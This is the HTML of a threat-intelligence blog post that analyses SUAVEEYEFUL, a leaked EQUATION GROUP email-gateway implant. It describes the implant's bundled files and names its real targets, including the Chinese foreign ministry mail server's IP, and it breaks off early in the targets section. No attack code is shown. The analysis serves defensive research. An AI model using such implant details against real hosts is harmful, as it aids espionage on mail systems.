<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION GROUP | xorl %eax, %eax</title>
<link rel="pingback" href="https://xorl.wordpress.com/xmlrpc.php" />
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//s2.wp.com' />
<link rel='dns-prefetch' href='//s1.wp.com' />
<link rel='dns-prefetch' href='//s0.wp.com' />
<link href='https://fonts.gstatic.com' crossorigin rel='preconnect' />
<link rel="alternate" type="application/rss+xml" title="xorl %eax, %eax &raquo; Feed" href="https://xorl.wordpress.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="xorl %eax, %eax &raquo; Comments Feed" href="https://xorl.wordpress.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="xorl %eax, %eax &raquo; The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION&nbsp;GROUP Comments Feed" href="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/feed/" />
	<script type="text/javascript">
		/* <![CDATA[ */
		function addLoadEvent(func) {
			var oldonload = window.onload;
			if (typeof window.onload != 'function') {
				window.onload = func;
			} else {
				window.onload = function () {
					oldonload();
					func();
				}
			}
		}
		/* ]]> */
	</script>
	<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/s0.wp.com\/wp-includes\/js\/wp-emoji-release.min.js?m=1652185836h&ver=6.0.1-alpha-53658"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link crossorigin='anonymous' rel='stylesheet' id='all-css-0-1' href='https://s1.wp.com/_static/??-eJyNkutuwyAMhV9oQNNJUfZj2rNw8ZhTbsLQircfybYqa7t2f5AO5rOPjhGnxHQMBUIRvrLkqsVAIoOTBQxLkcqF4proSdzGHB6AxAwlSX1gq7r3HMM7BixNlA/wHUxViTnWHKRDKlfkD2Zrlwqy7ZUM4jg884nvharojFAurqNVlrkJKs3BuREG7apZHJLwYFCC63MXTxuRnGyQmQMrdeMew2O817b6F/S3+dXpJi3ZYi3MZjQXtv/dIsuCwdIDXMdvbM+HiQ+M0CcHLMOxh2h68OcX7HajzQaXBfR7n+R1CnewU+oMUyplIGL99Fg9+/oFC/fmX4dx3I27/TS8zJ9FIP2g?cssminify=yes' type='text/css' media='all' />
<style id='wp-block-library-inline-css'>
.has-text-align-justify {
	text-align:justify;
}
.wp-block-cover__image-background.has-parallax {
	background-size: cover;
}
</style>
<style id='global-styles-inline-css'>
body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--10: 0.3rem;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--spacing--90: 7.59rem;--wp--preset--spacing--100: 11.39rem;}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;}body .is-layout-flow > .alignright{float: right;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
.wp-block-audio{margin: 0 0 1em 0;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-table > table{margin: 0 0 1em 0;}
.wp-block-video{margin: 0 0 1em 0;}
.wp-block-embed{margin: 0 0 1em 0;}
.wp-block-image{margin: 0 0 1em 0;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
</style>
<link crossorigin='anonymous' rel='stylesheet' id='all-css-2-1' href='https://s2.wp.com/wp-content/themes/pub/journalist/style.css?m=1440110593h&cssminify=yes' type='text/css' media='all' />
<!--[if IE 6]>
<link rel='stylesheet' id='journalist-ie6-css'  href='https://s2.wp.com/wp-content/themes/pub/journalist/ie6.css?m=1270837707h&#038;ver=6.0.1-alpha-53658' media='all' />
<![endif]-->
<link crossorigin='anonymous' rel='stylesheet' id='all-css-4-1' href='https://s1.wp.com/_static/??-eJzTLy/QTc7PK0nNK9HPLdUtyClNz8wr1k9PzdfNyU9OLMnMz0Ph6KblJGYW6SUXF+voY9dalJqUk58OZKbrA1UhcUGa7HNtDU1MLU1MLMwNTbIAmkQtqg==?cssminify=yes' type='text/css' media='all' />
<link crossorigin='anonymous' rel='stylesheet' id='print-css-5-1' href='https://s2.wp.com/wp-content/mu-plugins/global-print/global-print.css?m=1465851035h&cssminify=yes' type='text/css' media='print' />
<style id='jetpack-global-styles-frontend-style-inline-css'>
:root { --font-headings: unset; --font-base: unset; --font-headings-default: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif; --font-base-default: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;}
</style>
<link crossorigin='anonymous' rel='stylesheet' id='all-css-8-1' href='https://s2.wp.com/_static/??-eJxti8sKgCAQAH8oW6KXHaJvMTE1Vldapd+PDh2iTsPADJxJaIrZxAyhiITF+siQiLPYUPkD2KnDR/uw1swV/F9M2isUSJbe8pmyM8EwuA4s0qrwDpYwN0PfymmUstsvZXo34g==?cssminify=yes' type='text/css' media='all' />
<script id='jetpack_related-posts-js-extra'>
var related_posts_js_options = {"post_heading":"h4"};
</script>
<script id='media-video-jwt-bridge-js-extra'>
var videopressAjax = {"ajaxUrl":"https:\/\/xorl.wordpress.com\/wp-admin\/admin-ajax.php","bridgeUrl":"https:\/\/s2.wp.com\/wp-content\/mu-plugins\/videopress\/js\/videopress-token-bridge.js","post_id":"5412"};
</script>
<script id='wpcom-actionbar-placeholder-js-extra'>
var actionbardata = {"siteID":"6013855","siteURL":"http:\/\/xorl.wordpress.com","xhrURL":"https:\/\/xorl.wordpress.com\/wp-admin\/admin-ajax.php","nonce":"469688b2f0","isLoggedIn":"","statusMessage":"","subsEmailDefault":"instantly","proxyScriptUrl":"https:\/\/s0.wp.com\/wp-content\/js\/wpcom-proxy-request.js?ver=20211021","shortlink":"https:\/\/wp.me\/ppetF-1pi","i18n":{"followedText":"New posts from this site will now appear in your <a href=\"https:\/\/wordpress.com\/read\">Reader<\/a>","foldBar":"Collapse this bar","unfoldBar":"Expand this bar"}};
</script>
<script crossorigin='anonymous' type='text/javascript' src='https://s2.wp.com/_static/??-eJx9jEsOwjAMBS+EiYpEKQvEWVpiooQktmyHz+0JK1AXLOfpzbgHw4WqYTWX1BVaYkZoijKHvkGsV9om3bifX2nAuYVY1Qnm2dADk9qK1lavSzZgoefrT/EePRILqn6ML4HRDSssEn3A7p/LaRj3u8NxmKYxvQFnG0na'></script>
<script type='text/javascript'>
	window.addEventListener( 'DOMContentLoaded', function() {
		rltInitialize( {"token":null,"iframeOrigins":["https:\/\/widgets.wp.com"]} );
	} );
</script>
<link crossorigin='anonymous' rel='stylesheet' id='all-css-0-2' href='https://s1.wp.com/wp-content/mu-plugins/highlander-comments/style.css?m=1660560984h&cssminify=yes' type='text/css' media='all' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://xorl.wordpress.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://s1.wp.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress.com" />
<link rel="canonical" href="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/" />
<link rel='shortlink' href='https://wp.me/ppetF-1pi' />
<link rel="alternate" type="application/json+oembed" href="https://public-api.wordpress.com/oembed/?format=json&amp;url=https%3A%2F%2Fxorl.wordpress.com%2F2022%2F06%2F22%2Fthe-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group%2F&amp;for=wpcom-auto-discovery" /><link rel="alternate" type="application/xml+oembed" href="https://public-api.wordpress.com/oembed/?format=xml&amp;url=https%3A%2F%2Fxorl.wordpress.com%2F2022%2F06%2F22%2Fthe-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group%2F&amp;for=wpcom-auto-discovery" />
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION GROUP" />
<meta property="og:url" content="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/" />
<meta property="og:description" content="I was checking the 2017 ShadowBrokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what …" />
<meta property="article:published_time" content="2022-06-22T07:19:17+00:00" />
<meta property="article:modified_time" content="2022-06-22T07:57:01+00:00" />
<meta property="og:site_name" content="xorl %eax, %eax" />
<meta property="og:image" content="https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=1200" />
<meta property="og:image:width" content="1200" />
<meta property="og:image:height" content="580" />
<meta property="og:image:alt" content="" />
<meta property="og:locale" content="en_US" />
<meta property="fb:app_id" content="249643311490" />
<meta property="article:publisher" content="https://www.facebook.com/WordPresscom" />
<meta name="twitter:text:title" content="The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION&nbsp;GROUP" />
<meta name="twitter:image" content="https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->
<link rel="shortcut icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" />
<link rel="icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" />
<link rel="apple-touch-icon" href="https://s2.wp.com/i/webclip.png" />
<link rel='openid.server' href='https://xorl.wordpress.com/?openidserver=1' />
<link rel='openid.delegate' href='https://xorl.wordpress.com/' />
<link rel="search" type="application/opensearchdescription+xml" href="https://xorl.wordpress.com/osd.xml" title="xorl %eax, %eax" />
<link rel="search" type="application/opensearchdescription+xml" href="https://s1.wp.com/opensearch.xml" title="WordPress.com" />
		<style id="wpcom-hotfix-masterbar-style">
			@media screen and (min-width: 783px) {
				#wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img {
					margin-top: 5px;
				}
			}
		</style>
		<meta name="application-name" content="xorl %eax, %eax" /><meta name="msapplication-window" content="width=device-width;height=device-height" /><meta name="msapplication-task" content="name=Subscribe;action-uri=https://xorl.wordpress.com/feed/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=Sign up for a free blog;action-uri=http://wordpress.com/signup/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Support;action-uri=http://support.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Forums;action-uri=http://forums.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="description" content="I was checking the 2017 ShadowBrokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what this software implant does and how it works. This was in a directory titled suaveeyeful_i386-unknown-mirapoint3.4.3 and it reveals lots&hellip;" />
<!-- Your Google Analytics Plugin is missing the tracking ID -->
</head>

<body class="post-template-default single single-post postid-5412 single-format-standard customizer-styles-applied highlander-enabled highlander-light">
<div id="container" class="group">

<h1><a href="https://xorl.wordpress.com/">xorl %eax, %eax</a></h1>

<div id="content" class="group">
<div class="post-5412 post type-post status-publish format-standard hentry category-reverse-engineering category-threat-intelligence">
	<h2 id="post-5412">The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION&nbsp;GROUP</h2>
			<p class="comments"><a href="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/#respond">leave a comment &raquo;</a></p>
	
	<div class="main">
		
<p>I was checking the 2017 ShadowBrokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what this software implant does and how it works. This was in a directory titled <a href="https://github.com/x0rz/EQGRP/tree/master/archive_files/suaveeyeful_i386-unknown-mirapoint3.4.3">suaveeyeful_i386-unknown-mirapoint3.4.3</a> and it reveals lots of interesting details. In summary:</p>



<ul><li>SUAVEEYEFUL is a CGI software implant for FreeBSD and Linux</li><li>SUAVEEYEFUL was used to spy on the email traffic of the Chinese MFA and the Japanese Waseda Research University at least since the early 2000s</li><li>The leaked file/operation was targeting MiraPoint email products</li><li>SUAVEEYEFUL had some innovative, for its time, TTPs like data encryption and fileless malware </li></ul>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img data-attachment-id="5416" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/mirapoint/" data-orig-file="https://xorl.files.wordpress.com/2022/06/mirapoint.jpg" data-orig-size="606,224" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="mirapoint" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/mirapoint.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/mirapoint.jpg?w=606" src="https://xorl.files.wordpress.com/2022/06/mirapoint.jpg?w=606" alt="" class="wp-image-5416" srcset="https://xorl.files.wordpress.com/2022/06/mirapoint.jpg 606w, https://xorl.files.wordpress.com/2022/06/mirapoint.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/mirapoint.jpg?w=300 300w" sizes="(max-width: 606px) 100vw, 606px" /></figure></div>


<p><strong><span style="text-decoration:underline;">The Leaked Files</span></strong></p>



<p>In that directory there are a few different files. Those are:</p>



<ul><li><strong>bdes</strong>: A copy of the <a href="https://www.freebsd.org/cgi/man.cgi?format=html&amp;query=bdes(1)">FreeBSD bdes</a> (tool to encrypt/decrypt using DES) command line utility, based on the FreeBSD <em>bdes</em> version 1.3.2.1 (from 22 Sep. 2000), but compiled on Linux in 2003.</li></ul>



<ul><li><strong>decode-base64</strong>: Simple Perl decoding script using <a href="https://metacpan.org/pod/MIME::Base64">MIME::Base64</a>.</li></ul>



<ul><li><strong>implant</strong>: ELF binary software implant component of SUAVEEYEFUL, built for i386 on FreeBSD version 4.3 (this version was released in April 2001).</li></ul>



<ul><li><strong>implant.mg1.waseda.ac.jp</strong>: ELF binary software implant component of SUAVEEYEFUL used against the Japanese Waseda Research University&#8217;s email gateway (variant of the <em>implant</em> file).</li></ul>



<ul><li><strong>opscript.se</strong>: The commands to execute in order to install the SUAVEEYEFUL (abbreviated as SE) software implant in the Japanese Waseda Research University.</li></ul>



<ul><li><strong>se</strong>: The client component of the SUAVEEYEFUL software implant, written in Bash. This copy has hardcoded targets for the Japanese Waseda Research University.</li></ul>



<ul><li><strong>se.old:</strong> Previous version of the SUAVEEYEFUL software implant client, written in Bash. This copy has a hardcoded target for the Chinese Ministry of Foreign Affairs email gateway.</li></ul>



<ul><li><strong>uriescape</strong>: Simple Perl script using <a href="https://metacpan.org/pod/URI::Escape">URI::Escape</a>.</li></ul>



<p>The utilities (<em>bdes</em>, <em>decode-base64</em> and <em>uriescape</em>) were bundled along with SUAVEEYEFUL because they are internally used. This ensured that the software implant would not rely on any external dependencies (other than default, at the time, core system utilities like <em>ls</em>, <em>cat</em>, <em>telnet</em>, etc.)</p>



<figure class="wp-block-image size-large"><img data-attachment-id="5419" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/se_files/" data-orig-file="https://xorl.files.wordpress.com/2022/06/se_files.jpg" data-orig-size="1208,330" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="se_files" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=700" src="https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=1024" alt="" class="wp-image-5419" srcset="https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=1024 1024w, https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=300 300w, https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=768 768w, https://xorl.files.wordpress.com/2022/06/se_files.jpg 1208w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>List of the files leaked by the Shadow Brokers under the suaveeyeful_i386-unknown-mirapoint3.4.3 directory</em></figcaption></figure>



<p><strong><span style="text-decoration:underline;">Targets</span></strong></p>



<p>The <em>se.old</em> client was potentially the one the operators were adapting for their new target. That is due to inconsistencies in its content which make it look like a draft/edited version of an old operation. A leftover comment identifies the mail.mfa.gov.cn (202.99.26.6) as its configured SUAVEEYEFUL target.</p>



<p>This was the email gateway of the Chinese Ministry of Foreign Affairs (MFA). Even to today, this IP address (202.99.26.6) still points to an email server from China&#8217;s MFA. It&#8217;s hard to determine when the EQUATION GROUP compromised this email server using the SUAVEEYEFUL software implant. Based entirely on the build times, we can assess that it was at least since the early 2000s.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img data-attachment-id="5421" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/se_cn_mfa_now/" data-orig-file="https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg" data-orig-size="1170,717" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="se_cn_mfa_now" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=700" src="https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=1024" alt="" class="wp-image-5421" srcset="https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=1024 1024w, https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=300 300w, https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=768 768w, https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg 1170w" sizes="(max-width: 